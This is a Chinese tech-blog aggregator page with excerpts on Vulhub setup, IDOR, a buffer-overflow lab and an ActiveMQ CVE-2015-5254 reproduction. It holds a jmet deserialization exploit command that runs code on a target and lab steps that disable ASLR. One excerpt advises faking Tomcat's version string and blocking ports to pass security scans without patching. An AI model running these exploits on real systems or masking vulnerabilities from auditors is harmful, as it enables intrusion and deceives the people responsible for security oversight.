漏洞

Vulhub搭建

ぃ、小莉子 提交于 2019-12-14 01:25:34
Vulhub是一个比较全面的漏洞集合,收集了近年来许多的重要漏洞,以开源的形式呈现,以docker的形式进行环境配置,提供了更简单的漏洞复现,只需要简单的命令即可实现漏洞复现。 官网 https://vulhub.org 环境打开 service docker start cd /vulhub/activemq/CVE-2015-5254 docker-compose up -d #构建漏洞环境,这个命令包括了docker-compose build 环境关闭 docker-compose down 来源: https://www.cnblogs.com/visionv/p/12037994.html

腾讯云 云镜功能

*爱你&永不变心* 提交于 2019-12-13 16:15:57
腾讯云主机安全又称之为腾讯云 云镜。是腾讯云服务器云主机安全必备。云镜解决主机入侵、高危漏洞等主机安全问题,在腾讯云服务器上面部署了云镜,你就不必为服务器的安全费心了,一切交给腾讯云 云镜处理就好了。 很多人找不到云镜的地址,因此在此把腾讯云云镜地址分享给大家。 腾讯云云镜地址点击打开 上面的地址,为腾讯云云镜的地址。 腾讯云云镜的作用 1、主机入侵行为检测,木马文件查杀,综合腾讯云全网安全情报,实时检测各种攻击行为,并对抗。 2、密码爆破检测,登录行为审计 3、资产组件识别,高危漏洞检测及修复,不必为服务器的安全而费心。 4、AI 木马查杀引擎,智能对抗各种恶意变形脚本及恶意代码。 5、Github木马样本检出率超出业界22%,高效检测隔离流行木马病毒 6、漏洞极速响应,云镜集成新一代反病毒引擎,及腾讯云智能分析系统 ,可快速对各种未知风险预警。 7、基于腾讯集团漏洞响应预警,快速完成主机漏洞评级响应和修复预案 8、占用资源低,防护在云端,一键部署,操作简单。兼容Windows 、CentOS、Debian、RedHat等主流操作系统 腾讯云云镜 ,基于腾讯在安全防护方面收集的海量安全数据,为腾讯云服务器用户提供黑客入侵检测和漏洞风险预警等安全防护服务,解决腾讯云服务器面临的各种安全风险及漏洞, 腾讯云云镜主机安全检测 帮助使用腾讯云服务器的用户构建安全的防护网络

越权漏洞简单分析

爱⌒轻易说出口 提交于 2019-12-13 15:50:58
一、原理 越权漏洞是Web应用程序中一种常见的安全漏洞。它的威胁在于一个账户即可控制全站用户数据。当然这些数据仅限于存在漏洞功能对应的数据。越权漏洞的成因主要是因为开发人员在对数据进行增、删、改、查询时对客户端请求的数据过分相信而遗漏了权限的判定。 二、分类 主要分为水平越权和垂直越权,简单了解一下这两者的区别: 水平越权: 指攻击者尝试访问与他拥有相同权限的用户资源。例如有一个写作网站,作者(A)登录后可以对自己的文章进行发布、查看、删除等操作。当删除一篇文章时,发送的请求 URL 如下: http://www.xxxx.com/article.php?action=delete&id=1 action 参数是要执行的动作 delete 删除,id 为文章 id 号。当 A 用户想恶意攻击时,将 id 号改为了 2,发送了如下 URL: http://www.xxxx.com/article.php?action=delete&id=2 因为 id 为 2 的文章不属于 A 用户,A 将 id 改为 2 删除成功,此时程序没有对请求进行相关的权限判断,导致任何人可操作,则为水平越权。 垂直越权: 垂直越权可以分为两种,分别是向上越权和向下越权。向上指一个低级别攻击者尝试访问高级别用户的资源,向下指一个高级别用户尝试访问低级别用户的资源。例如一个用户的个人信息管理页是 user

如何临时规避安全扫描的高危漏洞

北战南征 提交于 2019-12-11 23:23:15
信息中心对机房服务器进行安全扫描,短期内如何规避高危漏洞,在不影响线上业务的情况下通过安全扫描? 问题及风险描述 系统进行安全扫描,扫描出windous服务器和linux服务器皆存在高危漏洞。需要在短时间内进行修复,并且通过安全扫描。 我们知道,常规的漏洞修复流程一般都是对应用打补丁或者版本升级,这些操作耗费的时间较长,且危险系数较高,因为在未测试的情况下,我们并不知道版本升级之后是否还会兼容现在的业务场景,大概率会影响正常的线上业务。于是,我们就需要一些临时规避扫描的方法。 问题处理 1.windous的漏洞,临时规避安全扫描的方案有:打开防火墙,添加三条入站规则,两条是tcp的(禁止1-3388,3390-10000),一条禁止全部udp,只放通3389(远程桌面),当远程桌面也有漏洞时,可以把3389都禁止掉(前提是有控制台可登陆服务器)。扫描过后,清除刚刚设置的3条防火墙规则即可; 2.linux服务器上对tomcat是进行版本扫描,因此,在tomcat的lib目录下创建org/apache/catalina/util 目录,在此目录下创建ServerInfo.properties文件,然后添加以下内容: server.info=Apache Tomcat/8.5.24 server.number=8.5.24 #(较新较安全版本) server.built=Jan 18

20199319 缓冲区溢出漏洞试验

為{幸葍}努か 提交于 2019-12-11 23:22:20
缓冲区溢出漏洞试验 一、实验简介 缓冲区溢出是指程序试图向缓冲区写入超出预分配固定长度数据的情况。这一漏洞可以被恶意用户利用来改变程序的流控制,甚至执行代码的任意片段。这一漏洞的出现是由于数据缓冲器和返回地址的暂时关闭,溢出会引起返回地址被重写。 二、实验准备 输入以下命令安装用于编译32位C程序的软件包: sudo apt-get update sudo apt-get install -y lib32z1 libc6-dev-i386 sudo apt-get install -y lib32readline-gplv2-dev 三、实验过程 3.1 初始设置 1、Ubuntu 和其他一些 Linux 系统中,使用地址空间随机化来随机堆(heap)和栈(stack)的初始地址,这使得猜测准确的内存地址变得十分困难,而猜测内存地址是缓冲区溢出攻击的关键。因此本次实验中,使用以下命令关闭这一功能: sudo sysctl -w kernel.randomize_va_space=0 2、为了进一步防范缓冲区溢出攻击及其它利用 shell 程序的攻击,许多shell程序在被调用时自动放弃它们的特权。因此,即使你能欺骗一个 Set-UID 程序调用一个 shell,也不能在这个 shell 中保持 root 权限,这个防护措施在 /bin/bash 中实现。linux 系统中,/bin

缓冲区溢出漏洞实验 20199321

China☆狼群 提交于 2019-12-11 12:00:10
缓冲区溢出漏洞实验 缓冲区溢出是指程序试图向缓冲区写入超出预分配固定长度数据的情况。这一漏洞可以被恶意用户利用来改变程序的流控制,甚至执行代码的任意片段。这一漏洞的出现是由于数据缓冲器和返回地址的暂时关闭,溢出会引起返回地址被重写。 实验准备 输入命令安装一些用于编译 32 位 C 程序的软件包 sudo apt-get update sudo apt-get install -y lib32z1 libc6-dev-i386 sudo apt-get install -y lib32readline-gplv2-dev 关闭使用地址空间随机化来随机堆(heap)和栈(stack)的初始地址功能 sudo sysctl -w kernel.randomize_va_space=0 设置 zsh 程序 sudo su cd /bin rm sh ln -s zsh sh exit 输入命令“linux32”进入32位linux环境,输入“/bin/bash”使用bash 漏洞程序 在 /tmp 目录下新建一个 stack.c 文件,程序会读取一个名为“badfile”的文件,并将文件内容装入“buffer”。 编译该程序,并设置 SET-UID。 sudo su gcc -m32 -g -z execstack -fno-stack-protector -o stack stack

网络安全规范

旧时模样 提交于 2019-12-11 11:25:59
一:敏感信息泄露 1.1什么属于敏感信息 只要这些数据可以被黑客看到,并且对黑客的攻击有帮助的信息,都属于敏感信息。 1.2什么是敏感信息泄露 敏感信息泄露,是指人们把不该公开的信息,给放入到公开的信息库中,造成敏感信息泄露。 1.3怎样检查敏感信息是否加密 需要通过抓包工具,检查数据在传输过程中是否加密。 1.4 常见敏感信息分类 1.4.1 软件泄漏 软件类: 1. 操作系统版本 , 2.中间件的类型、版本 , 3.Web程序(cms类型及版本、敏感文件) 1.4.2 Web敏感信息 phpinfo()信息泄漏 描述:Web站点的某些测试页面可能会使用到PHP的phpinfo()函数,会输出服务器的关键信息。如下图所示: 检测方法:访问http://[ip]/test.php 以及http://[ip]/phpinfo.php看是否成功。 修复方案:删除该PHP文件。 2.测试页面泄漏在外网 描述:一些测试页面泄漏到外网,导致外界误传公司被黑客入侵。如下图所示: http://parts.baby.qzoneapp.com/test.php http://other.baby.qzoneapp.com 检测方法:检测页面内容,看是否是测试页面。 修复方案:删除测试页面,例如test.cgi,phpinfo.php,info.pho, .svn/entries等。

ActiveMQ反序列化漏洞(CVE-2015-5254)复现

杀马特。学长 韩版系。学妹 提交于 2019-12-11 11:13:19
简介: Apache ActiveMQ是Apache软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring Framework等。Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程***者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。 1.首先在kali里面执行以下命令: cd var/opt wget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar mkdir external 2.输入: java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/sucess" -Yp ROME 192.168.199.120 61616 注释:-Q指定队列消息名,-I指定JMS客户端,这里是ActiveMQ,-Y指定具体的命令,-Yp指定payload类型,其后分别是ActiveMQ所在机器的ip及工作端口 3.现在会给目标的ActiveMQ添加一个名为事件的队列,可以我们通过http://192.168.199.120:8161/admin